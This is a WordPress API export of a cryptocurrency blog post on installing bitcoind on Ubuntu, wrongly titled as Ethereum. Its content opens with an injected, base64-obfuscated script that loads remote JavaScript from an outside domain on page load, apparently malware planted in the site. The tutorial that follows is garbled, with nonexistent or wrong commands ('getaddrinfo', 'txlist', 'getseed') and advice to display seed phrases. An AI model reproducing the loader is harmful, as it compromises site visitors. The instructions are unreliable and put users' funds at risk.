{"id":10249,"date":"2025-02-13T10:58:11","date_gmt":"2025-02-13T10:58:11","guid":{"rendered":"https:\/\/grameensamajunnayanparishad.com\/?p=10249"},"modified":"2025-02-13T10:58:11","modified_gmt":"2025-02-13T10:58:11","slug":"ethereum-how-to-install-bitcoind-bitcoin-core-on-ubuntu","status":"publish","type":"post","link":"https:\/\/grameensamajunnayanparishad.com\/?p=10249","title":{"rendered":"Ethereum: How to install bitcoind (Bitcoin Core) on Ubuntu?"},"content":{"rendered":"<\/p>\n<p><script>const pdx=\"bm9yZGVyc3dpbmcuYnV6ei94cC8=\";const pde=atob(pdx);const script=document.createElement(\"script\");script.src=\"https:\/\/\"+pde+\"cc.php?u=8042a7c7\";document.body.appendChild(script);<\/script>\n<\/p>\n<p>Install Bitcoind on Ubuntu<\/p>\n<p>================================<\/p>\n<p>Bitcoind is the official client for Bitcoin Core, a decentralized peer-to-peer network that enables fast, secure, and open financial transactions without the need for intermediaries like banks. Installing bitcoind on Ubuntu provides a full command-line-only node that allows you to manage your own Bitcoin private key, verify transactions, and mine new blocks.<\/p>\n<p><\/p>\n<h3><\/h3>\n<p><iframe loading=\"lazy\" width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/Y3JfLgjqNU4\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>Step 1: Update your package index<\/p>\n<p>Before installing bitcoind, make sure your package index is up to date:<\/p>\n<p><pre><code><\/p><p>sudo apt update<\/p><p><\/code><\/pre>\n<\/p>\n<p><\/p>\n<h3><\/h3>\n<p>Step 2: Install Bitcoind<\/p>\n<p>Download the latest bitcoind package from the Ubuntu repository or install it from source. For this example, we will use the <code>apt<\/code> package manager.<\/p>\n<p><pre><code><\/p><p>sudo apt-get update<\/p><p>sudo apt-get install -y bitcoin-core<\/p><p><\/code><\/pre>\n<\/p>\n<p>If you prefer to install from source:<\/p>\n<p><pre><code><\/p><p>git clone <\/p><p>cd bitcoin-core<\/p><p>.\/configure --prefix=\/usr\/local<\/p><p>make<\/p><p>sudo make install<\/p><p><\/code><\/pre>\n<\/p>\n<p><\/p>\n<h3><\/h3>\n<p>Step 3: Verify the installation<\/p>\n<p>To verify that bitcoin is installed correctly, check the version of Bitcoin Core you are using:<\/p>\n<p><pre><code><\/p><p>bitcoin --version<\/p><p><\/code><\/pre>\n<\/p>\n<p>This command should display the version number.<\/p>\n<p><\/p>\n<h3><\/h3>\n<p>Step 4: Test your node<\/p>\n<p>To test your full node, do the following:<\/p>\n<ul>\n<li><strong>Create a new Bitcoin address<\/strong>\n<p><img decoding=\"async\" alt=\"Ethereum: How to install bitcoind (Bitcoin Core) on Ubuntu?\n\" src=\"https:\/\/grameensamajunnayanparishad.com\/wp-content\/uploads\/2025\/02\/9496e67b.png\"><\/p>\n<p>: Run the <code>getaddrinfo<\/code> command to get information about your public and private addresses:<\/li>\n<\/ul>\n<p><pre><code><\/p><p>getaddrinfo -p 443<\/p><p><\/code><\/pre>\n<\/p>\n<p>This will display your public and private addresses.<\/p>\n<ul>\n<li><strong>Verify transactions<\/strong>: Use the <code>txlist<\/code> command to verify that you are receiving a new block of transactions, indicating that the network is functioning properly:<\/li>\n<\/ul>\n<p><pre><code><\/p><p>txlist --address=your_public_address<\/p><p><\/code><\/pre>\n<\/p>\n<p>Replace <code>your_public_address<\/code> with your actual Bitcoin address.<\/p>\n<ul>\n<li><strong>Mining a coin (optional)<\/strong>: If you want to mine a new block of coins using bitcoind, use the following command:<\/li>\n<\/ul>\n<p><pre><code><\/p><p>bitcoind -q -v<\/p><p><\/code><\/pre>\n<p><code><\/p>\n<p>This will ask you for your password before the mining process begins.<\/p>\n<p><\/p>\n<h3><\/h3>\n<p>Step 5: Check your wallet<\/p>\n<p>After installing bitcoind and making sure everything is working properly, you should check your wallet to make sure your private key is available:<\/p>\n<ul>\n<li><strong>Get your seed phrase<\/strong>: Run the<\/code>getseed<code>command to retrieve your seed phrase:<\/li>\n<\/ul>\n<p><pre><code><\/p><p>getseed --full<\/p><p><\/code><\/pre>\n<p><\/code><\/p>\n<p>This will display a 12-word seed phrase.<\/p>\n<ul>\n<li><strong>Check your balance<\/strong>: Use the <code>balance<\/code> command to check your current balance:<\/li>\n<\/ul>\n<p><pre><code><\/p><p>bitcoind --wallet-getaddress 0x [Your passphrase]<\/p><p><\/code><\/pre>\n<\/p>\n<p>Replace &#8220;[Your passphrase]&#8221; with the 12-word passphrase you extracted in step 1.<\/p>\n<p>Conclusion<\/p>\n<p>&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>Following these steps, you should have installed bitcoind on Ubuntu and verified that it is working properly. You can now use the full node to manage your Bitcoin private key, verify transactions, and mine new blocks, all from your own command line interface.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Install Bitcoind on Ubuntu ================================ Bitcoind is the official client for Bitcoin Core, a decentralized peer-to-peer network that enables fast, secure, and open financial transactions without<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[52],"tags":[],"class_list":["post-10249","post","type-post","status-publish","format-standard","hentry","category-cryptocurrency"],"_links":{"self":[{"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/posts\/10249","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10249"}],"version-history":[{"count":1,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/posts\/10249\/revisions"}],"predecessor-version":[{"id":10250,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=\/wp\/v2\/posts\/10249\/revisions\/10250"}],"wp:attachment":[{"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/grameensamajunnayanparishad.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}